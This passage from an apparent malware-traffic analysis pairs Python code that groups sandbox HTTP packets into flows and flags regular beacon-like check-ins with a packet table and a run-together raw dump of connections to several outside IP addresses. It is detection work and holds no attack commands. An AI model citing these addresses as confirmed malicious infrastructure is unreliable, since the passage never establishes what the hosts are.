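    ("17:41:04.720905066", 80, 49718, A, H), ("17:41:04.720993042", 49718, 80, H, A),
    ("17:41:04.723876953", 49718, 80, H, A), ("17:41:04.742607117", 80, 49718, A, H),
    ("17:41:19.911103010", 49720, 80, H, B), ("17:41:19.954582930", 80, 49720, B, H),
    ("17:41:19.954699993", 49720, 80, H, B), ("17:41:19.964936018", 49720, 80, H, B),
    ("17:41:19.993530035", 80, 49720, B, H), ("17:41:20.781038046", 80, 49720, B, H),
    ("17:41:20.781220913", 80, 49720, B, H), ("17:41:20.781276941", 49720, 80, H, B),
    ("17:41:21.469098091", 49720, 80, H, B),
    ("17:41:22.488272905", 49721, 80, H, B), ("17:41:22.517143965", 80, 49721, B, H),
    ("17:41:22.517252922", 49721, 80, H, B), ("17:41:22.527823925", 49721, 80, H, B),
    ("17:41:22.561120987", 80, 49721, B, H), ("17:41:23.331474066", 80, 49721, B, H),
    ("17:41:23.333440065", 80, 49721, B, H), ("17:41:23.333503962", 49721, 80, H, B),
    ("17:41:24.031600952", 49721, 80, H, B),
    ("17:41:25.050311089", 49722, 80, H, B), ("17:41:25.056299925", 80, 49722, B, H),
    ("17:41:25.056391954", 49722, 80, H, B), ("17:41:25.065902948", 49722, 80, H, B),
    ("17:41:25.070806026", 80, 49722, B, H), ("17:41:25.070986032", 80, 49722, B, H),
    ("17:41:25.711596012", 80, 49722, B, H), ("17:41:25.765860081", 49722, 80, H, B),
    ("17:41:25.864376068", 80, 49722, B, H), ("17:41:25.864595890", 49722, 80, H, B),
    ("17:41:26.578397036", 49722, 80, H, B),
    ("17:41:27.597284079", 49723, 80, H, B), ("17:41:27.602535963", 80, 49723, B, H),
    ("17:41:27.602663994", 49723, 80, H, B), ("17:41:27.609587908", 49723, 80, H, B),
    ("17:41:27.614463091", 80, 49723, B, H), ("17:41:28.289849043", 80, 49723, B, H),
    ("17:41:28.290087938", 80, 49723, B, H), ("17:41:28.290155888", 49723, 80, H, B),
    ("17:41:28.292628050", 49723, 80, H, B), ("17:41:28.297756910", 80, 49723, B, H),
    ("17:41:33.418371916", 49725, 80, H, C), ("17:41:33.427057028", 80, 49725, C, H),
    ("17:41:33.429825068", 49725, 80, H, C), ("17:41:33.441397905", 49725, 80, H, C),
]


def to_seconds(ts):
    """'HH:MM:SS.fffffffff' -> seconds since midnight. strptime only accepts six
    fractional digits, so the nine-digit timestamps are split by hand."""
    hh, mm, ss = ts.split(":")
    return int(hh) * 3600 + int(mm) * 60 + float(ss)


def build_flows(packets, host=H):
    """Group packets into flows keyed by (client port, server IP, server port).
    The sandbox host is always the client; packets are counted per direction."""
    flows = {}
    for ts, sport, dport, src, dst in packets:
        outbound = src == host
        key = (sport, dst, dport) if outbound else (dport, src, sport)
        f = flows.setdefault(key, {"first": None, "last": None, "out": 0, "in": 0})
        t = to_seconds(ts)
        f["first"] = t if f["first"] is None else min(f["first"], t)
        f["last"] = t if f["last"] is None else max(f["last"], t)
        f["out" if outbound else "in"] += 1
    return flows


def beacon_candidates(flows, min_flows=3, max_jitter=0.10):
    """Servers contacted by at least min_flows separate connections whose start
    times are spaced at a near-constant interval (pstdev/mean <= max_jitter)."""
    starts = defaultdict(list)
    for (_cport, ip, port), f in flows.items():
        starts[(ip, port)].append(f["first"])
    result = {}
    for server, times in starts.items():
        if len(times) < min_flows:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        jitter = pstdev(gaps) / avg if avg else float("inf")
        if jitter <= max_jitter:
            result[server] = {"connections": len(times), "interval": avg, "jitter": jitter}
    return result


if __name__ == "__main__":
    flows = build_flows(PACKETS)
    for (cport, ip, port), f in sorted(flows.items()):
        print(f"{H}:{cport} -> {ip}:{port}  out={f['out']} in={f['in']} "
              f"duration={f['last'] - f['first']:.3f}s")
    for (ip, port), b in beacon_candidates(flows).items():
        print(f"beacon-like: {b['connections']} connections to {ip}:{port} "
              f"every {b['interval']:.2f}s (jitter {b['jitter']:.1%})")
```

Run against the rows below, the four connections to 81.2.196.19:80 (ports 49720 to 49723) start about 2.56 seconds apart with well under one percent jitter, each lasting roughly 0.7 to 1.5 seconds, which is the regular short-lived check-in pattern worth pivoting on in proxy or NetFlow data; the single connections to 172.81.61.224 and 85.159.66.93 do not reach the three-connection minimum and are not flagged.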
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 22, 2024 17:41:04.086803913 CEST | 49718 | 80 | 192.168.2.6 | 172.81.61.224
Sep 22, 2024 17:41:04.091708899 CEST | 80 | 49718 | 172.81.61.224 | 192.168.2.6
Sep 22, 2024 17:41:04.091821909 CEST | 49718 | 80 | 192.168.2.6 | 172.81.61.224
Sep 22, 2024 17:41:04.101147890 CEST | 49718 | 80 | 192.168.2.6 | 172.81.61.224
Sep 22, 2024 17:41:04.106101036 CEST | 80 | 49718 | 172.81.61.224 | 192.168.2.6
Sep 22, 2024 17:41:04.719127893 CEST | 80 | 49718 | 172.81.61.224 | 192.168.2.6
Sep 22, 2024 17:41:04.720905066 CEST | 80 | 49718 | 172.81.61.224 | 192.168.2.6
Sep 22, 2024 17:41:04.720993042 CEST | 49718 | 80 | 192.168.2.6 | 172.81.61.224
Sep 22, 2024 17:41:04.723876953 CEST | 49718 | 80 | 192.168.2.6 | 172.81.61.224
Sep 22, 2024 17:41:04.742607117 CEST | 80 | 49718 | 172.81.61.224 | 192.168.2.6
Sep 22, 2024 17:41:19.911103010 CEST | 49720 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:19.954582930 CEST | 80 | 49720 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:19.954699993 CEST | 49720 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:19.964936018 CEST | 49720 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:19.993530035 CEST | 80 | 49720 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:20.781038046 CEST | 80 | 49720 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:20.781220913 CEST | 80 | 49720 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:20.781276941 CEST | 49720 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:21.469098091 CEST | 49720 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:22.488272905 CEST | 49721 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:22.517143965 CEST | 80 | 49721 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:22.517252922 CEST | 49721 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:22.527823925 CEST | 49721 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:22.561120987 CEST | 80 | 49721 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:23.331474066 CEST | 80 | 49721 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:23.333440065 CEST | 80 | 49721 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:23.333503962 CEST | 49721 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:24.031600952 CEST | 49721 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:25.050311089 CEST | 49722 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:25.056299925 CEST | 80 | 49722 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:25.056391954 CEST | 49722 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:25.065902948 CEST | 49722 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:25.070806026 CEST | 80 | 49722 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:25.070986032 CEST | 80 | 49722 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:25.711596012 CEST | 80 | 49722 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:25.765860081 CEST | 49722 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:25.864376068 CEST | 80 | 49722 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:25.864595890 CEST | 49722 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:26.578397036 CEST | 49722 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:27.597284079 CEST | 49723 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:27.602535963 CEST | 80 | 49723 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:27.602663994 CEST | 49723 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:27.609587908 CEST | 49723 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:27.614463091 CEST | 80 | 49723 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:28.289849043 CEST | 80 | 49723 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:28.290087938 CEST | 80 | 49723 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:28.290155888 CEST | 49723 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:28.292628050 CEST | 49723 | 80 | 192.168.2.6 | 81.2.196.19
Sep 22, 2024 17:41:28.297756910 CEST | 80 | 49723 | 81.2.196.19 | 192.168.2.6
Sep 22, 2024 17:41:33.418371916 CEST | 49725 | 80 | 192.168.2.6 | 85.159.66.93
Sep 22, 2024 17:41:33.427057028 CEST | 80 | 49725 | 85.159.66.93 | 192.168.2.6
Sep 22, 2024 17:41:33.429825068 CEST | 49725 | 80 | 192.168.2.6 | 85.159.66.93
Sep 22, 2024 17:41:33.441397905 CEST | 49725 | 80 | 192.168.2.6 | 85.159.66.93
                                                                Sep 22, 2024 17:41:33.446664095 CEST804972585.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:34.955717087 CEST4972580192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:34.966970921 CEST804972585.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:34.967053890 CEST4972580192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.971978903 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.977056980 CEST804972685.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:35.977186918 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.986820936 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:35.991787910 CEST804972685.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:37.500849962 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:37.516253948 CEST804972685.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:37.516341925 CEST4972680192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.519217014 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.527056932 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:38.527287960 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.537328005 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:38.542804003 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:38.542980909 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:40.047208071 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:40.059578896 CEST804972885.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:40.059669018 CEST4972880192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.127441883 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.132601976 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.132735968 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.252269030 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.257275105 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.844948053 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.845019102 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:41.845208883 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.847832918 CEST4972980192.168.2.685.159.66.93
                                                                Sep 22, 2024 17:41:41.852756023 CEST804972985.159.66.93192.168.2.6
                                                                Sep 22, 2024 17:41:46.905200958 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:46.912375927 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:46.912527084 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:47.003547907 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:47.052047014 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:47.437525034 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:47.437706947 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:48.516175032 CEST4973080192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:48.525729895 CEST80497303.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:49.536590099 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:49.541584015 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:49.541676998 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:49.552201033 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:49.557054996 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:50.057920933 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:50.058046103 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:51.062975883 CEST4973180192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:51.067915916 CEST80497313.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.081391096 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:52.522433996 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.522636890 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:52.532500982 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:52.537482977 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.537549019 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.983364105 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:52.983479977 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:54.047188997 CEST4973280192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:54.052551985 CEST80497323.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.065958977 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.071109056 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.071293116 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.078181028 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.083019018 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.528479099 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.528537035 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:41:55.528796911 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.531353951 CEST4973380192.168.2.63.33.130.190
                                                                Sep 22, 2024 17:41:55.536299944 CEST80497333.33.130.190192.168.2.6
                                                                Sep 22, 2024 17:42:00.553106070 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:00.560101032 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:00.560429096 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:00.571456909 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:00.576271057 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169397116 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169428110 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169445992 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169462919 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169481993 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169502974 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169513941 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.169517040 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169533014 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169548988 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.169567108 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.169584990 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.170106888 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.170914888 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.174412012 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174448013 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174467087 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174504995 CEST8049735209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:01.174525023 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:01.174559116 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:02.078603983 CEST4973580192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.097784042 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.102776051 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.103051901 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.113465071 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.118524075 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697058916 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697113991 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697150946 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697180986 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697186947 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697217941 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697251081 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697283983 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697315931 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697350979 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697365046 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697365046 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697365046 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.697387934 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.697511911 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.702311993 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702373981 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702408075 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702426910 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.702444077 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702552080 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:03.702627897 CEST8049736209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:03.702693939 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:04.634958029 CEST4973680192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.644210100 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.651356936 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:05.651428938 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.663593054 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:05.670502901 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:05.672744036 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336571932 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336606026 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336620092 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336694002 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336707115 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336719036 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336790085 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336806059 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336817980 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336843014 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336864948 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336888075 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.336913109 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.336922884 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.337013960 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:06.341563940 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341634989 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341646910 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341675997 CEST8049737209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:06.341780901 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:07.172415018 CEST4973780192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.192006111 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.198446035 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.198513985 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.207600117 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.214399099 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814095974 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814115047 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814127922 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814208031 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814219952 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814232111 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814244986 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814383030 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814383030 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.814395905 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814409018 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.814461946 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.814548969 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.819174051 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.819236994 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.819248915 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:08.819982052 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.822549105 CEST4973880192.168.2.6209.74.95.29
                                                                Sep 22, 2024 17:42:08.827368021 CEST8049738209.74.95.29192.168.2.6
                                                                Sep 22, 2024 17:42:14.211810112 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:14.216831923 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:14.216911077 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:14.229240894 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:14.236447096 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:14.672823906 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:14.672981024 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:15.735744953 CEST4973980192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:15.741745949 CEST804973915.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:16.779516935 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:16.785655022 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:16.788774967 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:16.850892067 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:16.855799913 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:17.250310898 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:17.250698090 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:18.360618114 CEST4974080192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:18.365664005 CEST804974015.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.395262957 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:19.400293112 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.400382996 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:19.437231064 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:19.442166090 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.442231894 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.858378887 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:19.858515024 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:20.953532934 CEST4974180192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:20.958790064 CEST804974115.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:21.972455978 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:21.977478981 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:21.977580070 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:21.986989021 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:21.991903067 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:22.448048115 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:22.448100090 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:42:22.449845076 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:22.458657980 CEST4974280192.168.2.615.197.172.60
                                                                Sep 22, 2024 17:42:22.463505983 CEST804974215.197.172.60192.168.2.6
                                                                Sep 22, 2024 17:43:44.514023066 CEST8049769188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:44.514090061 CEST4976980192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.516578913 CEST4976980192.168.2.6188.114.96.3
                                                                Sep 22, 2024 17:43:44.523260117 CEST8049769188.114.96.3192.168.2.6
                                                                Sep 22, 2024 17:43:49.722112894 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:49.729536057 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:49.730006933 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:49.794701099 CEST4977080192.168.2.6154.23.184.240
                                                                Sep 22, 2024 17:43:49.802252054 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:50.671076059 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:50.671376944 CEST8049770154.23.184.240192.168.2.6
                                                                Sep 22, 2024 17:43:50.671461105 CEST4977080192.168.2.6154.23.184.240
